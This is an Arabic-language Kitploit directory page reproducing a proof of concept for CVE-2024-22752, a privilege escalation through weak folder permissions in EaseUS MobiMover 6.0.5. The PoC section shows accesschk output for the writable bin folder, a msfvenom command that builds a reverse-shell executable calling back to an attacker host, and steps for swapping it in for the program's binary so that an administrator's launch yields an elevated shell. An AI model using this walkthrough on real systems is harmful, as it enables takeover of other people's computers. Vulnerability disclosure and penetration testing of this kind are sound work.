Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-22752 — EaseUS MobiMover 6.0.5 Build 21620 - أذونات الملفات والمجلدات غير الآمنة | Kitploit
أدوات/GitHubGitHub/hacker625/cve-2024-22752
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالسوء التكويناستغلال الملفات الثنائية
GitHubhacker625/cve-2024-22752

CVE-2024-22752

EaseUS MobiMover 6.0.5 Build 21620 - أذونات الملفات والمجلدات غير الآمنة

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

EaseUS MobiMover 6.0.5 Build 21620 - صلاحيات غير آمنة للملفات والمجلدات

يعاني ملف MobiMoverUILaunch.exe من ثغرة رفع صلاحيات يمكن أن يستخدمها "مستخدم مُوثَّق" لتعديل الملف التنفيذي للخدمة بملف ثنائي من اختياره داخل مجلد bin. ترجع هذه الثغرة إلى مجموعة ضعيفة من الصلاحيات الممنوحة لمجموعة "المستخدمين المُوثَّقين" والتي تمنح العلم (M) المعروف بـ "صلاحية التعديل".

alt text

الصفحة الرئيسية للبائع: https://www.easeus.com/
رابط البرنامج: https://down.easeus.com/product/mobimover_trial_setup
جوجل درايف: https://drive.google.com/file/d/1tqP00IV-WzqNpyE1Rnqwdg_44RxOhINQ/view?usp=sharing
فيديو الإثبات: https://www.youtube.com/watch?v=FR4cQm-z4Gw

#PoC

root@kitploit:~
C:\Users\creatigon>accesschk -uwvqd "C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin"

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
        FILE_ALL_ACCESS
  RW NT SERVICE\TrustedInstaller
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  1. إنشاء ملف ثنائي ضار على كالي لينكس باستخدام msfvenom
    msfvenom -f exe -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f exe -o prepare.exe

  2. نقل الملف المُنشأ 'prepare.exe' إلى جهاز ويندوز من كالي كوصول مستخدم منخفض المستوى

  3. نقل الملف الثنائي 'prepare.exe' المُنشأ إلى 'C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin\prepare.exe' لاستبدال الملف القديم كوصول مستخدم منخفض المستوى

  4. عندما يقوم المسؤول بتشغيل التطبيق، ستحصل على شِل عكسي بصلاحيات المسؤول

تنزيل الأداة